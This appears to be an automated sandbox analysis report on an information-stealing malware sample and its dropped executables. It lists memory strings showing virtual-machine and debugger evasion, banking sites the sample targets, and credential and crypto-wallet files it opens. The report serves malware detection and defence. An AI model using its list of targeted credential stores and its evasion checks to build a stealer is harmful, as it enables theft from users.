                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}83teX9h\JX0OQi4nZtiqLogin Data For Account-journal
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rootpagecomVMware20,11696487552o
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ebrokers.co.inVMware20,11696487552d
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx*B
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .utiitsl.comVMware20,1169648755
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s.portal.azure.comVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,116964878
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Brs
                          Source: I2jCDr35mu.exe, 00000000.00000003.2260665171.0000000005C9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Bmp3
                          Source: I2jCDr35mu.exe, I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000008.00000002.2346616566.0000000000618000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000F.00000002.2633807221.0000000000618000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.000000000107B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487550
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000s\user\AppData\Local\Temp%
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9Be
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_5E024E9B
                          Source: I2jCDr35mu.exe, 00000000.00000003.2224303335.0000000005CE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696$
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX9
                          Source: MPGPH131.exe, 00000007.00000003.2290339339.000000000151F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comVMware20,11696487552o
                          Source: I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}rogramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsZZ
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o.inVMware20,11696487552~
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: MPGPH131.exe, 00000007.00000003.2284261562.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: U5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYp
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: MPGPH131.exe, 00000006.00000003.2297172525.00000000062A4000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2295544971.000000000629B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoH
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696487552
                          Source: I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, RageMP131.exe, 00000008.00000002.2346616566.0000000000618000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 0000000F.00000002.2633807221.0000000000618000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: MPGPH131.exe, 00000007.00000003.2262988892.0000000006314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ccount.microsoft.com/profileVMware20,11696487552u
                          Source: MPGPH131.exe, 00000007.00000003.2273452151.0000000006336000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeThread information set: HideFromDebugger
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04D803A0 Start: 04D80464 End: 04D804320_2_04D803A0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04E0018A Start: 04E00242 End: 04E001B90_2_04E0018A
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_054A07D6 Start: 054A09D5 End: 054A07E56_2_054A07D6
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_0554062F Start: 0554064F End: 0554064B6_2_0554062F
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: regmonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: gbdyllo
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: procmon_window_class
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: ollydbg
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: filemonclass
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: NTICE
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: SICE
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPortJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exeProcess queried: DebugPort
                          Source: C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_04D10D98 rdtsc 0_2_04D10D98
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0004FAD0 mov eax, dword ptr fs:[00000030h]0_2_0004FAD0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_00044B00 mov eax, dword ptr fs:[00000030h]0_2_00044B00
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A0FAD0 mov eax, dword ptr fs:[00000030h]6_2_00A0FAD0
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 6_2_00A04B00 mov eax, dword ptr fs:[00000030h]6_2_00A04B00
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe "C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknownJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.linkedin.com/login
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
                          Source: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\KFLpYwMPXjapw3SVf9HA.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
                          Source: I2jCDr35mu.exe, 00000000.00000003.2301162754.00000000060E9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2671445352.0000000006719000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2450769589.000000000679A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: I2jCDr35mu.exe, I2jCDr35mu.exe, 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, MPGPH131.exe, 00000006.00000002.3334513200.0000000000CB8000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000002.3207735109.0000000000CB8000.00000040.00000001.01000000.00000005.sdmpBinary or memory string: s&Program Manager
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeCode function: 0_2_0010CE0B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0010CE0B
                          Source: C:\Users\user\Desktop\I2jCDr35mu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 51.2.MSIUpdaterV131.exe.ef0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 47.2.idPXKSo93Tb9SEEu9e8w.exe.e80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 48.2.MSIUpdaterV131.exe.ef0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000033.00000003.2673856805.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.2671707007.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000003.2504348053.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.2988504929.0000000000E81000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.2726513631.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000033.00000002.2815292742.0000000000EF1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 6.3.MPGPH131.exe.1461520.9.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 1096, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 3632, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 7216, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tYPDz_TYm0NTu0Y5ud8z_nO.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\up45CFBz_Ai1CiBRyRFsyfp.zip, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, type: DROPPED
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
                          Source: MPGPH131.exe, 00000006.00000003.2261862623.0000000001495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty Extension
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: MPGPH131.exe, 00000006.00000002.3401083597.0000000006290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: g\Ethereum\walle
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
                          Source: MPGPH131.exe, 00000006.00000003.2506172514.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveGQ
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.jsonJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
                          Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
